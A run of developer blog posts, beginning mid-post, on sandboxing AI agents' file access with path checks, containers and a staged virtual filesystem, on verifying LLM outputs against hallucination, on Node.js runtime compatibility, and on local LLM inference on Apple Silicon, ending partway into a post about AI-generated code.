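A sloppy check that compares path strings without resolving would let link/secret.txt through, because the string really does start with the workspace path.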

Approach 2: Container isolation

The next step up is putting the whole agent in a container with a bind-mounted workspace.

# Run the agent inside a container, only mount what it needs
docker run --rm \
  --network=none \
  -v "$PWD/workspace:/work:rw" \
  -v "$PWD/readonly-context:/ctx:ro" \
  --read-only \
  --tmpfs /tmp:size=512m \
  agent-image:latest

This is what I default to for anything touching real code. The blast radius is genuinely bounded — even if the agent goes off the rails, it can only mess up /work.

The downside is startup cost and the friction of getting tooling into the container. Every new language runtime, every binary the agent might invoke, has to be pre-baked into the image or installed at runtime. I've spent more time debugging "why doesn't node exist in here" than I'd like to admit.

Approach 3: A virtual filesystem layer

This is where projects like Mirage come in. The pitch, as I read it, is that the agent talks to a virtual filesystem API instead of the real FS, and the layer underneath decides what actually happens — overlay changes in memory, commit them on confirmation, expose a consistent path namespace across backends. Check the official repo before relying on specifics; the project looks early and the API surface may shift.

Conceptually, the pattern looks like this:

# Sketch of the virtual FS pattern (not Mirage's exact API)
fs = VirtualFS(
    root="./project",   # underlying real directory
    mode="overlay",     # writes go to an overlay, not the real FS
)

# Agent calls look like normal FS ops
fs.write("src/app.py", new_content)
fs.read("README.md")

# But changes are staged, not committed
diff = fs.pending_changes()  # inspect what the agent did
fs.commit()                  # apply to real FS
# or
fs.discard()                 # throw it all away

What I like about this model:

Review-before-apply is built in. The agent can do 50 file edits and I get to see the diff before any of them touch disk.
Path consistency. The agent always sees ./src/app.py, regardless of whether the backend is a local dir, an object store, or an in-memory overlay.
Cheaper than containers for the common case of "edit some files, run some checks."

What I'm cautious about:

It's another abstraction layer. When something breaks, you're now debugging the agent, the VFS, and the underlying storage.
Isolation is logical, not physical. If the agent shells out to a subprocess, that subprocess sees the real FS unless you also wrap exec calls. A container actually contains; a virtual FS doesn't, by itself.
It's new. I haven't tested Mirage thoroughly enough to vouch for edge cases like large binary files, partial writes, or concurrent agents on the same overlay.
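To show how little machinery the staging pattern needs, here's a toy in-memory overlay in Python. To be clear, this is my own sketch and has nothing to do with Mirage's actual implementation or API. It handles text files only and has exactly the limitation described above: subprocesses bypass it entirely.

```python
import tempfile
from pathlib import Path


class OverlayFS:
    """Stage writes in memory on top of a real directory (illustrative only)."""

    def __init__(self, root):
        self.root = Path(root).resolve()
        self._staged = {}  # resolved target path -> new content

    def _resolve(self, rel_path):
        target = (self.root / rel_path).resolve()
        if not target.is_relative_to(self.root):
            raise PermissionError(f"path escapes root: {rel_path}")
        return target

    def read(self, rel_path):
        target = self._resolve(rel_path)
        if target in self._staged:
            return self._staged[target]  # staged content shadows the disk
        return target.read_text()

    def write(self, rel_path, content):
        self._staged[self._resolve(rel_path)] = content  # nothing touches disk

    def pending_changes(self):
        return {p.relative_to(self.root).as_posix(): c for p, c in self._staged.items()}

    def commit(self):
        for target, content in self._staged.items():
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(content)
        self._staged.clear()

    def discard(self):
        self._staged.clear()


def demo():
    """Stage a write, confirm the disk is untouched, then commit it."""
    with tempfile.TemporaryDirectory() as tmp:
        fs = OverlayFS(tmp)
        fs.write("src/app.py", "print('hi')\n")
        staged_only = not (Path(tmp) / "src" / "app.py").exists()
        fs.commit()
        on_disk = (Path(tmp) / "src" / "app.py").read_text()
        return staged_only, on_disk
```

Everything hard about a real VFS layer (deletes, binary files, partial writes, concurrent agents) is missing here, which is exactly the list of edge cases I'd want to test before trusting one.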

Side by side

	Raw FS + allowlist	Container	Virtual FS layer
Setup cost	Lowest	Highest	Medium
Blast radius	Workspace dir (if careful)	Container boundary	Logical workspace
Subprocess isolation	None	Yes	None (unless wrapped)
Review before apply	Manual (git)	Manual (git)	Built into the model
Startup latency	None	Seconds	Milliseconds
Good for	Quick scripts	Real code changes	Iterative agent loops

How I'd pick today

If I'm running a coding agent against a repo I care about, I'm still reaching for containers first. The physical isolation is just too valuable when an agent decides to get creative with find -delete.

If I'm building an interactive loop — agent proposes changes, I approve, agent continues — a virtual FS layer is genuinely better. The commit/discard semantics map directly onto the workflow, and you skip the container startup tax on every iteration.

If I'm prototyping and the workspace is already disposable, raw FS with a path-resolution check is fine. Don't over-engineer it.
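
For reference, a path-resolution check for the raw FS case can be very small. This is a minimal sketch, assuming a single workspace root and Python 3.9+ (for Path.is_relative_to); the name resolve_in_workspace is made up for illustration and is not part of any tool discussed here.

```python
from pathlib import Path


def resolve_in_workspace(workspace: Path, requested: str) -> Path:
    """Resolve `requested` against `workspace` and refuse anything outside it."""
    root = workspace.resolve()
    # resolve() collapses ".." segments and follows symlinks, so the check
    # below runs against the real target rather than the spelled-out path.
    candidate = (root / requested).resolve()
    if not candidate.is_relative_to(root):
        raise PermissionError(f"{requested!r} escapes the workspace")
    return candidate
```

Call it at the top of every read and write tool. It does nothing for subprocesses the agent spawns, and a symlink created after the check can still race it, so treat it as a guard rail rather than a sandbox.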

A migration sketch

If you're currently on raw FS and want to try a VFS layer, the migration is less invasive than you'd expect:

# Before: direct FS calls scattered through the agent's tools
from pathlib import Path

def read_file_tool(path: str) -> str:
    return Path(path).read_text()

def write_file_tool(path: str, content: str) -> None:
    Path(path).write_text(content)

# After: same interface, FS calls go through the virtual layer
def read_file_tool(path: str) -> str:
    return fs.read(path)

def write_file_tool(path: str, content: str) -> None:
    fs.write(path, content)  # staged, not yet on disk

# New control surface: review/commit between agent steps
def step_complete():
    show_diff(fs.pending_changes())
    if user_approves():
        fs.commit()
    else:
        fs.discard()

The tool interface barely changes. What changes is the control loop around it — you now have a place to insert review and approval that you didn't have before.
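
To make the commit/discard semantics concrete, here is a toy in-memory overlay. It is a sketch only: StagedFS is a hypothetical class whose method names mirror the calls in the snippets above, and it is not Mirage's implementation or API. It handles text files and ignores deletes, binary data, and concurrency.

```python
from pathlib import Path


class StagedFS:
    """Toy write-staging overlay: reads fall through to disk, writes wait in memory."""

    def __init__(self, root: Path):
        self.root = Path(root)
        self._staged = {}  # relative path -> pending text content

    def read(self, path: str) -> str:
        # Staged content wins, so the agent sees its own uncommitted edits.
        if path in self._staged:
            return self._staged[path]
        return (self.root / path).read_text()

    def write(self, path: str, content: str) -> None:
        self._staged[path] = content  # nothing touches disk yet

    def pending_changes(self) -> dict:
        return dict(self._staged)  # copy, so callers cannot mutate the stage

    def commit(self) -> None:
        for rel, content in self._staged.items():
            target = self.root / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(content)
        self._staged.clear()

    def discard(self) -> None:
        self._staged.clear()
```

The whole review step comes down to one dictionary: until commit() runs, the real directory is untouched, and discard() is a single clear().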

That's the real reason I'm watching this category. Containers won the "how do we sandbox processes" question a decade ago. The "how do we sandbox an agent's intentions before they become actions" question is still wide open, and a virtual filesystem is one of the more interesting answers I've seen lately.

Debugging confidently wrong answers from LLM-powered features

Alan West — Sun, 10 May 2026 16:50:23 GMT

The bug that took two weeks to surface

A few months back I shipped a feature that used a language model to summarize support tickets and suggest responses. Internal QA loved it. The demo went great. Two weeks after launch, our support lead pinged me on Slack: "Are these summaries... making things up?"

They were. Not always. Maybe one in fifty. But the ones that were wrong looked exactly as confident as the correct ones — same tone, same structure, same plausible-looking detail. A ticket about a failed payment got summarized as "user wants to cancel subscription." A complaint about slow load times got rephrased as "user reports outage in EU region."

If you've shipped anything LLM-backed in production, this story is probably familiar. The model isn't broken. The benchmark scores look great. But the tail is full of confidently wrong answers, and your users are the ones finding them.

Here's what I learned debugging this, and the layered approach that finally got our hallucination rate down to something I could live with.

Why this happens (and why it's hard to catch)

The first thing to internalize: a language model produces fluent text whether or not the underlying reasoning is sound. There's no "I'm not sure" signal you can read off the surface output. The model that confidently invents a detail and the model that confidently states a true fact look identical from your application's perspective.

Worse, evaluation suites usually skew toward typical inputs. Your eval probably hits the median case. Production traffic hits the tail — weird formatting, unusual entities, contradictory context, ambiguous pronouns, multi-language messages. Tail behavior is where hallucinations live.

In our case, the model was misreading tickets where the customer mentioned multiple unrelated topics. The summarizer would latch onto whichever topic appeared first or had the strongest sentiment, and confidently summarize that as the whole ticket.

Step 1: Constrain the output structure

Free-form prose gives the model room to confabulate smoothly. Constraining the output forces it to commit to specific claims you can verify.

Instead of asking for a summary, I asked for a structured object:

# Bad: free-form prose, hard to validate
prompt = f"Summarize this ticket:\n{ticket}"

# Better: structured claims we can check one by one
schema = {
    "primary_issue": "str",        # one short phrase, must appear in source
    "customer_intent": "enum[refund, cancel, technical_help, billing, other]",
    "mentioned_order_ids": "list[str]",
    "sentiment": "enum[neutral, frustrated, angry]",
    "requires_human": "bool",
}

JSON Schema or function-calling features from most providers work even better, since they constrain at the decoding layer. The point is: you want discrete claims, not paragraphs. Claims you can check. Prose you cannot.
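
Even without provider-side enforcement, the structured object can be checked in plain Python before anything downstream sees it. A minimal sketch, assuming the model returns JSON with the five fields from the schema above; parse_summary is a hypothetical helper, and the "must appear in source" rule is implemented as a case-insensitive substring test, which is one strict reading of that comment.

```python
import json

INTENTS = {"refund", "cancel", "technical_help", "billing", "other"}
SENTIMENTS = {"neutral", "frustrated", "angry"}


def parse_summary(raw: str, ticket_text: str) -> dict:
    """Parse the model's JSON and reject anything that breaks the schema."""
    data = json.loads(raw)  # raises json.JSONDecodeError (a ValueError) on bad JSON
    if not isinstance(data, dict):
        raise ValueError("expected a JSON object")

    issue = data.get("primary_issue")
    if not isinstance(issue, str) or not issue.strip():
        raise ValueError("primary_issue must be a non-empty string")
    if issue.lower() not in ticket_text.lower():
        raise ValueError("primary_issue must be a phrase from the ticket")

    intent = data.get("customer_intent")
    if not (isinstance(intent, str) and intent in INTENTS):
        raise ValueError("customer_intent is not an allowed value")

    sentiment = data.get("sentiment")
    if not (isinstance(sentiment, str) and sentiment in SENTIMENTS):
        raise ValueError("sentiment is not an allowed value")

    ids = data.get("mentioned_order_ids")
    if not isinstance(ids, list) or not all(isinstance(i, str) for i in ids):
        raise ValueError("mentioned_order_ids must be a list of strings")

    if not isinstance(data.get("requires_human"), bool):
        raise ValueError("requires_human must be a boolean")
    return data
```

Every failure is a ValueError, so the caller needs a single except clause to route bad output to the fallback path.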

Step 2: Add a verifier pass

This was the change that actually moved the needle. Run the output through a second model call whose only job is to check whether each claim is supported by the source.

def verify_claim(source_text: str, claim: str) -> str:
    prompt = (
        "You are a strict fact-checker. Given the SOURCE and the CLAIM,\n"
        "answer with exactly one word: YES, NO, or UNCERTAIN.\n"
        "YES means the claim is explicitly supported by the source.\n"
        f"SOURCE:\n{source_text}\n\nCLAIM:\n{claim}\n\nANSWER:"
    )
    return call_llm(prompt, max_tokens=4).strip().upper()

def accept(source, output) -> bool:
    # Treat UNCERTAIN as failure on high-stakes paths.
    for claim in output.claims():
        if verify_claim(source, claim) != "YES":
            return False
    return True

A few things matter for the verifier:

Use a different prompt structure than the generator. You don't want correlated failure modes.
Force a discrete answer (YES/NO/UNCERTAIN). No prose, no chain-of-thought leaking into the output.
Treat UNCERTAIN as failure for high-stakes outputs. Cheap, conservative, surprisingly effective.

Yes, you're paying for extra calls (one verifier call per claim in the sketch above). In our case cost roughly doubled per request, and that was fine, because the alternative was customer-visible mistakes.

Step 3: Deterministic guards on the things you can actually check

LLMs don't need to be involved in checking facts that have a definite answer. If your output mentions an order ID, regex-check the format and look it up in your database. Numbers, dates, IDs, enum values, email addresses — all deterministic.

I added a small guard layer that runs after the verifier:

import re

# fullmatch() anchors both ends; with match() and "$", "ORD-12345678\n" would pass.
ORDER_ID = re.compile(r"ORD-\d{8}")

def guard(output, ticket) -> bool:
    for oid in output.mentioned_order_ids:
        if not ORDER_ID.fullmatch(oid):
            return False  # malformed ID
        if oid not in ticket.body:
            return False  # model invented an order ID
        if not db.orders.exists(oid):
            return False  # ID doesn't resolve
    return True

If any deterministic check fails, we don't show the response at all. We fall back to a templated message: "we received your ticket, an agent will respond shortly." Boring, but never wrong.
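
Here is one way the generator, the checks, and the templated fallback could be wired together. It is a sketch under assumptions: respond is a hypothetical function, and the generator and checks are passed in as plain callables so the example stays independent of any particular LLM client.

```python
from typing import Callable, List, Optional

FALLBACK = "We received your ticket, an agent will respond shortly."


def respond(
    ticket_text: str,
    generate: Callable[[str], Optional[str]],
    checks: List[Callable[[str, str], bool]],
) -> str:
    """Return the model's draft only if every check passes; otherwise the template."""
    try:
        draft = generate(ticket_text)
        # all() short-circuits, so cheap checks should come first in the list.
        if draft and all(check(ticket_text, draft) for check in checks):
            return draft
    except Exception:
        # A crashed generator or checker is treated the same as a failed check.
        pass
    return FALLBACK
```

The property worth keeping is that there is exactly one exit for model text and it sits behind every check. Anything unexpected lands on the template.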

Step 4: Log the disagreements

For every request, log the generator output, the verifier verdict, and the guard outcome. Then build a dashboard of disagreements. Within a week you'll see patterns — specific input shapes that trigger more verifier failures, specific claim types that get confabulated.

This is where you get the data to improve your prompt, swap models, or fine-tune. Without it you're guessing.
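
A dashboard is not needed to get started; one JSON line per request is enough to begin counting. The sketch below assumes the verifier verdicts are kept per claim field. The record layout and both function names are illustrative, not what we ran in production.

```python
import json
import time
from collections import Counter


def log_decision(log_file, ticket_id, output, verdicts, guard_ok):
    """Append one JSON line per request so disagreements can be queried later."""
    record = {
        "ts": time.time(),
        "ticket_id": ticket_id,
        "output": output,
        "verdicts": verdicts,  # e.g. {"primary_issue": "YES", "customer_intent": "NO"}
        "guard_ok": guard_ok,
    }
    log_file.write(json.dumps(record) + "\n")


def failing_claim_types(lines):
    """Count which claim fields the verifier rejected, most frequent first."""
    counts = Counter()
    for line in lines:
        record = json.loads(line)
        for field, verdict in record["verdicts"].items():
            if verdict != "YES":
                counts[field] += 1
    return counts.most_common()
```

Running failing_claim_types over a week of logs gives a ranked list of the fields that get confabulated most, which is usually the first thing worth knowing.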

Prevention tips for next time

A few things I'd do from day one on the next project:

Decide on output structure before you write the prompt. Pick the schema first, then write a prompt that produces it. Don't bolt structure on later.
Build evals from production logs, not synthetic examples. Synthetic examples test what you imagined. Logs test what users actually do.
Treat the model as one component, not the whole system. Validators, guards, retrieval, deterministic checks — these aren't workarounds, they're the architecture. A good LLM feature is mostly not the LLM.
Keep a templated fallback for every code path. When the model is uncertain, users should get a boring correct response — not a creative wrong one.
Sample and review. Set up a review queue, look at 50 outputs a week, write down what you find. There's no substitute.

The bigger lesson

The thing I keep coming back to is that fluency is not correctness. A model that produces beautiful, well-structured, confident text saying the wrong thing is in some sense more dangerous than one that produces obvious garbage. Garbage gets caught. Confident wrongness gets shipped.

Build the verifier. Add the guards. Log everything. Then sleep slightly better.

Debugging the 0.2%: When Node.js Code Fails on Alternative Runtimes

Alan West — Sun, 10 May 2026 16:37:54 GMT

You ever migrate a Node.js service to an alternative JavaScript runtime, watch most of your tests pass, then spend an entire afternoon hunting down the handful that fail? I have. Three times this year.

Here's the thing about runtime compatibility numbers — they sound great in headlines. "99.8% Node.js compatibility" is a real flex. But when you're the dev whose login flow lives in the 0.2%, that number suddenly feels useless.

This post walks through how I debug compatibility failures when running existing Node code on alternative runtimes. The approach is the same regardless of which runtime you're targeting.

The Problem

You've got an existing Node.js codebase. It works fine on Node 20. You decide to try a faster runtime — maybe for cold start improvements, maybe just to benchmark. You install it, point it at your entry file, and...

$ alt-runtime run server.js
TypeError: process.binding is not a function
    at requireBuiltin (internal/util.js:42:18)
    at Module._compile (...)

Or worse — it starts. Tests pass. Production breaks two days later because some edge case in crypto.createHash returns a slightly different object shape.

These failures look random. They aren't. They cluster around a few predictable categories.

Root Cause: Where Compatibility Actually Breaks

Most "Node-compatible" runtimes implement the public node:* API surface. The trouble is that "Node compatible" is a fuzzy claim, and the gaps usually fall into four buckets:

1. Internal APIs

Stuff like process.binding, internalBinding, or anything from node:internal/*. These are explicitly private, but plenty of npm packages rely on them. If a package was last updated in 2017, there's a decent chance it's reaching into Node internals you didn't know about.

2. Behavioral differences in public APIs

The function signature matches Node. The return type matches. But the behavior is subtly different — different error codes, different event ordering, different timing for setImmediate vs process.nextTick.

3. Missing modules

Whole modules sometimes aren't implemented. node:vm, node:cluster, and node:worker_threads are the usual suspects, depending on the runtime.

4. Native addons

If your dependency tree pulls in anything that compiles a .node file, alternative runtimes often can't load it without a workaround. N-API support varies in maturity.

Step-by-Step Debugging

Here's the workflow I run through every time. It usually finds the issue in 15-30 minutes.

Step 1: Get a clean reproduction

Don't debug inside your full app. Strip it down. I keep a repro/ directory in every project for exactly this:

// repro/test-crypto.js
// Minimal repro for the hash mismatch I saw in auth.js
const crypto = require('node:crypto');

const h1 = crypto.createHash('sha256');
h1.update('test');
console.log('first digest:', h1.digest('hex'));
// Calling digest() twice — does this throw or return empty?
console.log('second digest:', h1.digest('hex'));

Run the same file under Node and the alternative runtime. If the output differs, you've localized the failure.

Step 2: Find which API is implicated

When the stack trace is unhelpful, instrument the suspect module. I use a tiny tracing Proxy:

// trace.js — wraps a module and logs every call shape
function trace(mod, name) {
  return new Proxy(mod, {
    get(target, prop) {
      const value = target[prop];
      if (typeof value !== 'function') return value;
      return (...args) => {
        // Log call shape so I can diff runtimes side-by-side
        console.error(`[${name}.${String(prop)}]`, args.map(a => typeof a));
        return value.apply(target, args);
      };
    }
  });
}

const fs = trace(require('node:fs'), 'fs');
// now use `fs` as normal — every call gets logged with arg types

Run this on both runtimes and diff the output. The first diverging line is almost always your culprit.
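
Finding the first diverging line is easy to script. The helper below is a sketch in Python so it does not depend on either runtime under test. It captures stdout followed by stderr (so interleaving between the two streams is lost), and the function names are my own.

```python
import subprocess
from itertools import zip_longest


def run_lines(cmd):
    """Run a command and return its stdout, then stderr, as one list of lines."""
    proc = subprocess.run(cmd, capture_output=True, text=True)
    return (proc.stdout + proc.stderr).splitlines()


def first_divergence(a, b):
    """Return (line_number, line_a, line_b) for the first mismatch, or None."""
    # zip_longest pads the shorter output with None, so a missing line
    # counts as a divergence instead of being silently ignored.
    for n, (x, y) in enumerate(zip_longest(a, b), start=1):
        if x != y:
            return n, x, y
    return None
```

Usage would look like first_divergence(run_lines(["node", "repro/test-crypto.js"]), run_lines(["alt-runtime", "run", "repro/test-crypto.js"])), with alt-runtime standing in for whatever binary you are testing.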

Step 3: Check the runtime's compatibility tracker

Every serious alternative runtime publishes a known-incompatibilities list. Find it in their official docs before you start writing workarounds — odds are someone already filed your issue and there's a documented workaround.

A quick search of the runtime's GitHub issues with is:issue node compat is also worth thirty seconds.

Step 4: Apply the right kind of fix

Once you know what's broken, the fix usually falls into one of three patterns:

// Pattern A: feature-detect and branch
const hasFeature = typeof process.someAPI === 'function';
const result = hasFeature
  ? process.someAPI(input)
  : fallbackImplementation(input); // pure-JS fallback

// Pattern B: pin a userland polyfill instead of the runtime built-in
// e.g. use a pure-JS hashing lib for one specific call site
//      where the native crypto behavior diverges

// Pattern C: isolate the bad path behind a runtime check
const runtime =
  typeof globalThis.Bun !== 'undefined' ? 'bun' :
  typeof globalThis.Deno !== 'undefined' ? 'deno' :
  'node';

module.exports = runtime === 'node'
  ? require('./node-impl')
  : require('./portable-impl');

Pattern A is the cleanest. Pattern C is the ugliest, but sometimes you have no choice — especially with native addons.

Prevention: Stop Hitting These in the First Place

A few habits that have saved me real time:

Run your full test suite on the alt runtime in CI from day one. Not just unit tests — the integration tests that exercise weird APIs. A green build today doesn't mean green tomorrow when you bump a dep.
Audit your dependency tree for native addons. Run npm ls --all to list the full tree, and look for binding.gyp files in node_modules. Native addons are where most of my migration pain comes from.
Avoid undocumented Node APIs in your own code. If it's not in the official Node API docs, it's not portable. process.binding, _extend, anything starting with an underscore — pretend they don't exist.
Watch the runtime's release notes for "Node compat" entries. Every release usually moves the line. Knowing what just got fixed saves you from working around something that no longer needs working around.
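
The native-addon audit from the list above is a short directory walk. This sketch flags two common markers, a binding.gyp build file or a compiled .node binary; it is a heuristic, not an exhaustive detector, and find_native_addons is a name I made up.

```python
import os


def find_native_addons(node_modules):
    """List paths under node_modules that hint at a native addon."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(node_modules):
        for name in filenames:
            # binding.gyp marks a node-gyp build; *.node is a compiled addon.
            if name == "binding.gyp" or name.endswith(".node"):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)
```

An empty list is a good sign but not proof: packages that download prebuilt binaries at install time may keep them somewhere this walk does not recognize.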

The Honest Take

The 99.8% number isn't lying. It's just that "passing the test suite" and "running my specific production workload" are different problems. Test suites cover documented APIs and well-trodden paths. Your production code does whatever your dependencies decided to do five years ago.

The good news: if you adopt the debugging workflow above, the 0.2% becomes tractable. Most of the failures I've hit have a 30-minute fix once I stop guessing and start tracing.

Pick a runtime, run your tests, and when something breaks — don't panic, instrument it.

Why local LLM inference stalls on Apple Silicon (and how to fix it)

Alan West — Sun, 10 May 2026 16:31:34 GMT

I spent a chunk of last month trying to run a 30B-class model locally on my M2 Max. 64GB of unified memory, a stack of GPU cores, no other apps running. Should be smooth. Instead I got around 3 tokens per second, a fan that sounded like a leaf blower, and the slow creeping suspicion that I was holding it wrong.

If you've tried serious local inference on Apple Silicon, you've probably hit this. The hardware is genuinely capable. The software stack often isn't — or rather, the generic software stack isn't. This came back into focus for me when antirez (yes, the Redis guy) posted ds4, a from-scratch Metal inference engine targeting DeepSeek. The README is pretty explicit that it's a focused, learning-oriented project rather than a general framework, but seeing it made me want to write up why the focused approach keeps winning on Apple Silicon, and what you can do about slow local inference today.

The root cause: it's bandwidth, not FLOPS

Here's the thing nobody tells you when you start: during token-by-token decoding, an LLM is almost entirely memory-bandwidth-bound, not compute-bound. Every generated token requires streaming the full set of weights (or at least every weight touched by that forward pass) from memory through the GPU, plus reading and writing the KV cache.

A quick napkin calculation. Say you have a 7B-parameter model in 4-bit quantization. That's 3.5GB of raw weights, or roughly 4GB once you add quantization scales and other overhead. To generate one token, you read all 4GB once. If your effective memory bandwidth to the GPU is around 200 GB/s (well under the theoretical peak on M-series Max chips, but realistic for many workloads), the floor on per-token latency is:

4 GB / 200 GB/s = 20 ms => ~50 tokens/sec ceiling

If you're getting 3 tokens/sec, you're not bandwidth-limited. You're losing time somewhere else in the stack. The questions are where, and why.
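
The same arithmetic as two small functions, so you can plug in your own model and chip. This is a sketch: it counts weight traffic only and ignores KV cache reads, so real ceilings are somewhat lower. The 30B example is my own extrapolation from the parameter count, not a measured figure.

```python
def weights_gb(params_billion, bits_per_weight):
    """Raw weight size in GB: 1e9 params * bits / 8 bits per byte / 1e9."""
    return params_billion * bits_per_weight / 8


def decode_ceiling(weight_gb, bandwidth_gb_s):
    """Upper bound on tokens/sec if every weight is streamed once per token."""
    return bandwidth_gb_s / weight_gb


print(decode_ceiling(4.0, 200.0))                        # 50.0, the number above
print(round(decode_ceiling(weights_gb(30, 4), 200.0), 1))  # 13.3 for a 30B-class model
```

Even for a 30B-class model at 4 bits, the bandwidth ceiling at 200 GB/s is around 13 tokens/sec, so 3 tokens/sec leaves a lot unexplained.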

Where time actually goes

When I profiled my run with Instruments and the Metal System Trace template, three things jumped out:

Tons of tiny kernel launches. Each transformer layer was firing off many small Metal compute encoders — softmax, RMSNorm, rotary embeddings, masks — and the GPU spent more time in dispatch overhead than in actual math.
Quantization on the wrong side of the bus. Some kernels were dequantizing weights into FP16, writing the FP16 back to memory, then doing the matmul. That defeats the point of quantization, which is to shrink the bytes you stream.
KV cache being copied around. The cache was being reallocated on every step in some paths instead of being grown in place.

Generic frameworks make these mistakes because they're trying to be everything to everyone. A focused inference engine for one model family can hardcode the right answers.

Step 1: fuse your kernels

The single biggest win is fusing the small operations in each transformer block into one or two big kernels. Here's the pattern I converged on, in pseudocode:

// Fused: RMSNorm -> Q/K/V projection -> RoPE
// Avoids three separate dispatches and two round trips through memory.
kernel void attn_qkv_rope(
    device const half*  x        [[buffer(0)]],  // input activations
    device const uint8_t* w_qkv  [[buffer(1)]],  // 4-bit packed weights
    device const half*  scales   [[buffer(2)]],  // per-group scales
    device half*        q_out    [[buffer(3)]],
    device half*        k_out    [[buffer(4)]],
    device half*        v_out    [[buffer(5)]],
    constant Params&    p        [[buffer(6)]],
    uint tid [[thread_position_in_grid]]) {
    // 1) RMSNorm in-register, no temp buffer back to global mem
    float norm = rms_norm_inline(x, tid, p);

    // 2) Dequant + GEMV in the same pass: each weight tile is
    //    unpacked into registers and immediately consumed.
    half3 qkv = dequant_gemv_q4(w_qkv, scales, norm, tid, p);

    // 3) Apply rotary embeddings before the write-out.
    apply_rope(qkv, tid, p);

    write_split(q_out, k_out, v_out, qkv, tid);
}

Key idea: weights stay packed in 4-bit form in memory. They're unpacked into registers inside the kernel and consumed immediately. You never write a dequantized copy back to global memory. The matmul reads the small representation; the math happens on the wider one inside SIMD units.

That single change took my throughput on a small 7B model from "painful" to "actually usable." Your numbers will vary — but the principle holds for any chip with a memory wall.

Step 2: stop reallocating the KV cache

This one bit me hard. A naive implementation grows the KV tensor by allocating a bigger buffer each step and copying. On Metal that means an MTLBlitCommandEncoder round trip for every token. Don't do this.

Preallocate once, write in place:

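// Preallocate KV for max_seq_len at startup.
// Writes are O(1) per token; no resize, no copy.
// `half` is assumed to be a 16-bit float type (e.g. __fp16 with Clang on arm64).
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef struct {
    half* k;            // [n_layers][max_seq][n_kv_heads][head_dim]
    half* v;
    int   capacity;     // max_seq_len
    int   length;       // current logical length
} kv_cache_t;

static inline void kv_append(kv_cache_t* c,
                             const half* k_new,
                             const half* v_new,
                             int layer, int n_kv, int head_dim) {
    // Capacity is checked in debug builds only, so the release hot path stays branch-free.
    assert(c->length < c->capacity);
    // Just write to the next slot; no allocation.
    size_t off = ((size_t)layer * c->capacity + c->length) * n_kv * head_dim;
    memcpy(c->k + off, k_new, n_kv * head_dim * sizeof(half));
    memcpy(c->v + off, v_new, n_kv * head_dim * sizeof(half));
}

// Call once per token, after every layer has appended, so all layers
// write to the same slot before the logical length moves on.
static inline void kv_advance(kv_cache_t* c) {
    c->length += 1;
}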

If you want to support eviction or sliding windows later, add it as a logical layer on top. Keep the hot path branch-free.
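
Preallocating means paying for max_seq_len up front, so it helps to know the bill before picking that number. A sketch of the sizing arithmetic for the layout in the struct above; the model shape in the example is hypothetical, chosen only to give round numbers.

```python
def kv_cache_bytes(n_layers, max_seq, n_kv_heads, head_dim, bytes_per_elem=2):
    """Bytes for K and V together with a [layer][seq][kv_head][dim] layout."""
    per_tensor = n_layers * max_seq * n_kv_heads * head_dim * bytes_per_elem
    return 2 * per_tensor  # one buffer for K, one for V


# Hypothetical shape: 32 layers, 8 KV heads, head_dim 128, 8192-token context, FP16.
size = kv_cache_bytes(n_layers=32, max_seq=8192, n_kv_heads=8, head_dim=128)
print(size / 2**30, "GiB")  # 1.0 GiB
```

The cost is linear in max_seq, so doubling the context window doubles the allocation whether or not the extra slots ever get used.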

Step 3: pick the right quantization for your hardware

Not all 4-bit schemes are equal on Metal. Group-wise quantization with a small group size (32 or 64) usually unpacks cleanly in SIMD lanes and plays nicely with the threadgroup memory you have. Block-wise schemes with larger groups save more on the scale-table side but can stall on misaligned reads.

My rough rule of thumb after migrating a few projects:

Q4 with group size 32: best balance for M-series; fast unpack, good quality.
Q5/Q6: noticeable quality bump, but you're trading away bandwidth — only worth it if you're already CPU-bound on dispatch.
Q8: simple, accurate, but uses 2x the bandwidth of Q4 for a marginal quality gain. Use it for debugging quantization bugs, not production.

This is the kind of tradeoff a focused engine bakes in; a generic one usually exposes all of them and lets you pick the wrong one.
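
Group size feeds directly into bandwidth, because every group carries its own scale. A quick sketch of the bytes you actually stream per weight, assuming one FP16 scale per group and no zero-point; real formats differ in the details.

```python
def effective_bits_per_weight(weight_bits, group_size, scale_bits=16):
    """Weight bits plus the per-group scale amortized over the group."""
    return weight_bits + scale_bits / group_size


for label, bits, group in [("Q4 g32", 4, 32), ("Q4 g64", 4, 64), ("Q8 g32", 8, 32)]:
    print(label, effective_bits_per_weight(bits, group))
# Q4 g32 4.5
# Q4 g64 4.25
# Q8 g32 8.5
```

Under these assumptions Q8 streams 8.5 / 4.5, or about 1.9 times, the bytes of Q4 at the same group size, and going from group size 32 to 64 saves only a quarter of a bit per weight.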

Prevention: profile before you optimize

Before you touch a single kernel, open Instruments with Metal System Trace and look at the timeline. You're looking for:

Long gaps between command buffer commits (CPU bottleneck — your encoding loop is too chatty).
Many tiny encoders inside one buffer (kernel fusion opportunity).
High occupancy but low achieved bandwidth (unaligned reads or scalar paths in your kernels).
Memory traffic that exceeds your model size per token (you're materializing dequantized weights — fix that first).

Apple's Metal Performance HUD and the official Metal Shading Language spec are your friends here. So is reading focused, single-model engines like ds4 — they tend to make the design choices explicit instead of hiding them behind abstraction.

The takeaway

Local inference on Apple Silicon isn't slow because the hardware is bad. It's slow when generic frameworks impose generic abstractions on a workload that punishes them. Fuse your kernels, keep weights packed, preallocate your KV cache, pick a quantization that maps well to SIMD, and profile before you guess. You'll get most of the way to what a hand-tuned engine achieves — and you'll understand your stack a lot better when something inevitably regresses.

Why AI-Generated Code Makes You Slower (And How to Fix Your Workflow)

Alan West — Sun, 10 May 2026 16:25:10 GMT

You've probably felt this. The first week you wired an AI assistant into your editor, you shipped twice as much. By month three, you were back to your old pace — except now you were debugging weirder bugs.

I've been using AI assistants in my daily workflow for about two years across four projects. The pattern keeps showing up: the productivity gains are real but front-loaded, and they erode unless you change how you work. Most of that erosion comes from one specific, fixable problem.

The Problem: Plausible Code That Doesn't Actually Work

The bug I see most often isn't an obvious syntax error. It's when generated code calls a function, method, or config option that looks exactly like something the library would have — but doesn't.

Last month I was building a CSV import feature and the assistant happily produced this:

import pandas as pd

# Read CSV with progress reporting — looks reasonable, right?
df = pd.read_csv(
    "users.csv",
    on_progress=lambda pct: print(f"Loading: {pct}%"),  # this kwarg does not exist
    chunksize=10_000,
)

